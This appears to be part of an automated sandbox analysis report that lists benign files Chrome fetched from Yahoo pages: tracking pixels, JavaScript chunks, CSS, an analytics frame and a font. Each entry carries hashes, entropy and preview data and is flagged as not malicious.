                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C621D45D24E262DF67EDEED62AC0341E40E851114B07346F11A7C3DEC2D34FE1909F07500CA197C57B46A26C2E32557239F881D9C79E3563DE9B6455053434C8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const l={beforeview:{root:null,rootMargin:"200px 0px",threshold:[0]},inview:{root:null,rootMargin:"0px",threshold:[0]},coversview:{root:null,rootMargin:"0% 0% -75% 0%",threshold:[0]},fullview:{root:null,rootMargin:"0px",threshold:[1]}};function s({preset:e="inview"}={}){const r=window._nimbus.intersectionObserver=window._nimbus.intersectionObserver??{},o=r[e];return o||(r[e]=new IntersectionObserver(i=>{for(let t=0;t<i.length;t++){const n=i[t],{target:c}=n;c.dispatchEvent(new CustomEvent("intersect",{detail:{entry:n,isIntersecting:n.isIntersecting,observer:r[e]}}))}},l[e]))}function v(e,r={}){return s(r).observe(e),{destroy(){s(r).unobserve(e)}}}export{s as g,v as i};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CU9yltxlHh/:m/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DF3E567D6F16D040326C7A0EA29A4F41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EA7DF583983133B62712B5E73BFFBCD45CC53736
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548F2D6F4D0D820C6C5FFBEFFCBD7F0E73193E2932EEFE542ACCC84762DEEC87
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B2CA25A3311DC42942E046EB1A27038B71D689925B7D6B3EBB4D7CD2C7B9A0C7DE3D10175790AC060DC3F8ACF3C1708C336626BE06879097F4D0ECAA7F567041
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1610), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1610
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.317017318435937
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:zBBh9ozqdwZCBBR9opFo0Z1lAl+9opFo0Zi9ozqdwZCHHbT:jn4EXkaSyikaSO4YHP
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DA05F5D596C887A6A5221011FA70D158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:76923BCDC453F807CF78D55E338B78ED8194D0CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1D8F5B2BBB996A8F30C64630E9D1EA256B4FCA3F5C937F0856DEF478848DB025
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:509024EAEBF85380CB6BD1D4A32728DD69A9B8865657259535754BBD89CBEBAA4608BDBD49631F880051F8A712CB416AFFD35D067D9ADD5B09D18CBF9FAE7036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/pv/static/ms/trendingNow-flameIcon.yhome-variable.a2368adb8251677d29ac1399a6f34c43.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview::root,html[data-color-scheme=dark] [data-maintain-color],html[data-color-theme-enabled][data-color-scheme=light]{--srch-tn-flame-color:linear-gradient(-63.94deg, #1D2228 0%, #1D2228 16.1%, #B23909 16.1%, #B23909 32.2%, #FF520D 32.2%, #FF520D 48.2%, #1D2228 48.2%, #1D2228 67.8%, #B23909 67.8%, #B23909 83.9%, #FF520D 83.9%);--srch-tn-flame-icon:url('https://s.yimg.com/pv/static/img/icon-flame-light-202303010352.gif')}html[data-color-theme-enabled][data-color-scheme=dark]{--srch-tn-flame-color:linear-gradient(-63.94deg, #FFFFFF 0%, #FFFFFF 16.1%, #A34810 16.1%, #A34810 32.2%, #FD6100 32.2%, #FD6100 48.2%, #FFFFFF 48.2%, #FFFFFF 67.8%, #A34810 67.8%, #A34810 83.9%, #FD6100 83.9%);--srch-tn-flame-icon:url('https://s.yimg.com/pv/static/img/icon-flame-dark-202303010353.gif')}@media (prefers-color-scheme:dark){html[data-color-theme-enabled]{--srch-tn-flame-color:linear-gradient(-63.94deg, #FFFFFF 0%, #FFFFFF 16.1%, #A34810 16.1%, #A34810 32.2%, #FD6100 32.2%, #FD6100 48.2%, #FFFFFF 48.2%, #FFF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (5503), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5503
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.376984635806113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:TeUg4KTMgKq8NGOzZZQujpcM8pmB9Q0C3MzDCprDVQ1nGXuX8Avva+b/70ApZV:6Ug4KTyNl/Qm3cy9SMHCpqp86a+joej
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:19720D3A285ABA8024B11FC9955795FE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8E174FF6003772BC71FFAF2B655E23FC4B8794CA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:00A54A79B12A7E6DC344AE20DEA91F7772A088C14CF9B12D4DD8CEFF8B374C11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B296C7311263B3B153353904B0D65131ED72F70F9A646795C07CE8DD3735329A6D6AAD99BD1C0F74742FC9E515D7CA1E78F44377EBBA55018331A986C93481A0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://opus.analytics.yahoo.com/tag/opus-frame.html?referrer=https%3A%2F%2Fwww.yahoo.com%2F&tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383&axids=gam%3Dy-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A%26dv360%3DeS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B%26ydsp%3Dy-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A%26tbla%3Dy-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A&gdpr=false&gdpr_consent=&gpp=DBAA&gpp_sid=-1&us_privacy=1YNN&reset_idsync=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!DOCTYPE html><html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="viewport" content="width=device-width,initial-scale=1"><script defer="defer">(()=>{"use strict";var t=function(t){if(t)return t;try{return document.location.hostname.match(/[\w]+\.([\w]+|co.uk)$/)[0]}catch(t){return""}};const e=function(e,n,r,o){(o||window.document).cookie="".concat(e,"=").concat(n,";Max-Age=").concat(31536e3,";Domain=").concat(t(r),";path=/;Secure;SameSite=None")},n=function(t){return new URLSearchParams(document.location.search.slice(1)).get(t)||""};var r,o=function(){var t=new Date("January 1, 2011 00:00:00 GMT").getTime()/1e3,e=(new Date).getTime()/1e3;return parseInt((e-t)/60/60,10)};!function(t){if(r&&!t)return r;var e=function(t){return parseInt(t,36)};r={};var n=function(t,e){for(var n="".concat(t,"="),r=(e||window.document).cookie.split(";"),o=0;o<r.length;o++){var a=(r[o]||"").trim();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2362)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2363
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4072764594615625
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:giD1CbajzZhmA+h/8WaZFKrjmdg45eS5R+/T2CLvZAd5wq2sTL6:gigb87X+h8lZFK/Rd1jq20L6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:61A98EA385876F3254A6EEFB2BED9A9C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:18C1CA36F86F273039691F6C4A6A5B36CF86C657
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2CDCF44AD57A5F0D1CD0DAAFE5EBCA40CFD1B2331B6865E67B23F55C91C4B0DC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C59676B600FCF00D6035B7C4F86880C61455E1E9FB877552E0DE6D8657E714A81EF252A99531B83F9F54D1BED400CFA631775780C92E830F4F991186C7F46380
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Header.Cq72aaJC.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as R,e as w,d as S,f as _,i as f,q as F,k as v,o as k,D as q,I as B,n as Y}from"./scheduler.Dsuh-FKt.js";import{S as A,i as I,c as T,b as x,m as D,t as E,a as H,d as P}from"./index.CvwOawEI.js";import{m as G,s as L,g as p,G as M}from"./commonUtil.BWwawKjd.js";import{R as V}from"./RMP.G38kzltP.js";import{g}from"./43.BgWy8GOF.js";function Q(c){let e;return{c(){e=w("div"),this.h()},l(t){e=S(t,"DIV",{class:!0}),_(e).forEach(f),this.h()},h(){F(e,"class","placeholder yf-6nfr06")},m(t,o){v(t,e,o)},p:Y,d(t){t&&f(e)}}}function U(c){let e,t,o;return t=new V({props:{key:"tdv2-wafer-header.HeaderYBar",data:c[1],$$slots:{default:[Q]},$$scope:{ctx:c}}}),{c(){e=w("div"),T(t.$$.fragment),this.h()},l(n){e=S(n,"DIV",{class:!0});var a=_(e);x(t.$$.fragment,a),a.forEach(f),this.h()},h(){F(e,"class","ybar-sticky")},m(n,a){v(n,e,a),D(t,e,null),o=!0},p(n,[a]){const d={};a&2048&&(d.$$scope={dirty:a,ctx:n}),t.$set(d)},i(n){o||(E(t.$$.fragment,n),o=!0)},o(n){H(t.$$.fragment,n),o=!1},d(n){n&&f(e),P(t)}}}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cm.g.doubleclick.net/pixel?google_nid=lijit_dbm&google_hm=SmExUkFRWkhFMXJ2elNGa1JYdUJVeVND&gdpr=0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1620)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.329855816477348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:c81aOTRVh9ThTT8LT7LbSZNW5EqxPlg58JeS6pOYnN8LiKkknE1DXRksI0fS5:rMOTnJ8zHVEqxPC58QS6pxBK7nElRksm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6D969B0F81242D36A88FA5922140249E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:404E22A5E111FA02CFB626D45B201E598B425FA5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7619B789D24BE9FCDC5B3A1DB864CA3B8194FA054D5881EEEA7F0D0F8A171705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:9C5CF9A3BC9170A9548DC8E36D349D2F751A3238177C60907F54720BF5F94736634DB4A1C12839F5EE5D0D2654F36F4CA87294ADD62CEDEA8709C203A832F61C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/zz/combo?s:aaq/vzm/cs_1.6.6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:!function(){"use strict";var c=window,t=c.document,e="*null",s=[1,9,10];function n(t,e,s,n){if(!t||!e||"function"!=typeof c[t])return n();try{c[t](e,s,(function(c,t){n(c,t)}))}catch(c){n()}}c.COMSCORE={_version:"1.6.6",beacon:function(r){n("__uspapi","getDoNotSell",1,(function(p,f){n("__tcfapi","getTCData",2,(function(n,o){var i=JSON.parse(JSON.stringify(r||{})),_=n&&n.gdprApplies||!1,a=c.YAHOO&&c.YAHOO.comscore||{},d=c.rapidInstance&&c.rapidInstance.getRapidAttribute;if(i.c1=i.c1||"2",i.c2=i.c2||a.c2||"7241469",i.c5=i.c5||d&&d("spaceid"),i.c7=i.c7||t.location.href,i.c8=i.c8||t.title||"",i.c9=i.c9||t.referrer||"",i.c14=i.c14||a.c14||"-1",i.gdpr=_?1:0,i.gdpr_consent="",_){if(o&&n){var u=s.every((c=>!0===n.purpose.consents[c])),l=!0===n.vendor.consents[77];i.cs_ucfr=u&&l?1:u&&l?"":0,i.gdpr_consent=n.tcString||""}}else f&&p&&"boolean"==typeof p.doNotSell?i.cs_ucfr=p.doNotSell?0:1:i.cs_ucfr=0;var g=i.cs_fpid||a.cs_fpid;if(g)if(i.cs_ucfr){var m=i.cs_fpdm||a.cs_fpdm;m&&m!==e?(i.cs_fpdm=m,i.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):151
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.166603250500697
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:HZ8sqDmJS4RKb5ykKcvXjXRHoNcH/efag2CiY9uvAZIAdSbFtn:H69mc4sl3O4/eigVh9SSA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7990D75ADD2B01D123E447DEA3E95F09
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:4B4C04F956F1184548E19F4E45C7402D3210BCDE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F6926955506914E94357E156171119DB9EFE5A01EC960C1E9F0874C6382A09CE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:657020567B7BBCD74C169DB26CF619219F03EBBDF6F508FBFD6B5DAA0136BCDB3A8DEC7A39A9E281B6B998FE2848F278911E3EAF649314C4CA42458002E776F6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/chevron_right.Cz_AJ_iF.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const s='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 6 8.59 7.41 13.17 12l-4.58 4.59L10 18l6-6z"/></svg>';export{s as R};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=sonobi&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=446fec19-bcd4-4b47-8df3-610d8322cfa3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=sovrn&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=Ja1RAQZHE1rvzSFkRXuBUySC&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):85
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.292908596521779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+kSI+DtjyREWqWv+ndp:6v/lhPfkCDtmDV+dp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:5BEC6606B8392065F9DA9898CA6F7B14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:73AC5B01B5E3293FB792179626E7F8369CDB944D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:ACCCC501AA6AFA3CFAC15E8DDCCF1561DEED2ED08C2F7D652ABBDBE9AA71609A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:36FEC10F71295203E59BCC52042EE2691E5DB51D26F6D76D4B19BFEDF4429FDE898C87ABC77CA29F6BB58E6217FF380F0650115C06395CB1DA270BD028C2CF80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://sync-tm.everesttech.net/upi/pid/b9pj45k4?redir=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9MjE5MSZ0bD0yNTkyMDA=&piggybackCookie=${TM_USER_ID}&gdpr=1&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR.............%.V.....PLTE......U..~....IDATx.c`.......'......IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Web Open Font Format (Version 2), TrueType, length 28108, version 1.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):28108
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.992351824245756
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:o6m1WFrUPQJP0/BW6+Vg3dLCwJqMFkAY3dNh5r8uvp:W1coPQ6Fig3FCiqMu9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:58B9E3CA84ACCC5D50AC893317CD6705
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FD393C1F50FD2F771DEB92BF8B26BD39F97DB2C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:22E9E86D745200109FBCB3E96695307FEA67880FCA509728194B2CFCE3906FA7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B28EC5CF5199E84F0CD3404BD3521850132B462F3587F0FA8B85805730F6A35627C16F0101246DD2FCFEF43BA20C9002B21AD6566B44E2016CF556127ECFAF4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/os/fontserver/YahooSans/Bold.woff2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:wOF2......m........,..mj..............................T.`..T.....s.....h..X.....6.$..0. ..d..,...[.nq...D.QP.m.P......8'.s;..m...`.^.6....cf.....IE.L:L.m.PED.....HAQ3.#..}.J..L_:|.\.[...........C.=.wS2]2.Y2e...O8".Hr.+.#-_.j..4.Mpw..|h){.b..<.e`...,.I.YxX*x....S.....Lp.....f{..5...c.]....{#......c.a.....Oj,.gA"....6RA....jXQ.\d....).......J_<.5.A...;5r|...J-.E....qt...i..E.F..*.M..(...HVN.$_...._..7...tiAT.R.KJ..n.{Ds.....$.K......)&m.TD)5....F.Z.P....R3.I...o3..5w....'......5p..h.....Bk.*.U.l....=..=. iV.H....,X.o....b.w.>....2....A.....d~A..~..+..@d....A@B)Q...*E..h..g..\..h..*..6...-"...o.E.Z..=...g.Y....%..#0$......%9......!0`...Y....Y=q...Zb]...l.Dd`..N..V.r\...t....y.@#N(\.'N}?....p.z..V..@.<....V[CB..N.u....c6x...S...{.....z).l:./{t.a.P..3.\......3..X1Y..W.;......<q...,...._9$6......b-.r..QA...$..DCj.S~`]^..}.O.oc.......J .&..m........&,A4Hn.....f.\y.%YYIV.D.KV.K.i....Q ...u._*3.[.R.T*.J%..<y....4..0..6...........F.\.6.`6.=.......m...zi..o.X.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1620)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1621
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.329855816477348
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:c81aOTRVh9ThTT8LT7LbSZNW5EqxPlg58JeS6pOYnN8LiKkknE1DXRksI0fS5:rMOTnJ8zHVEqxPC58QS6pxBK7nElRksm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6D969B0F81242D36A88FA5922140249E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:404E22A5E111FA02CFB626D45B201E598B425FA5
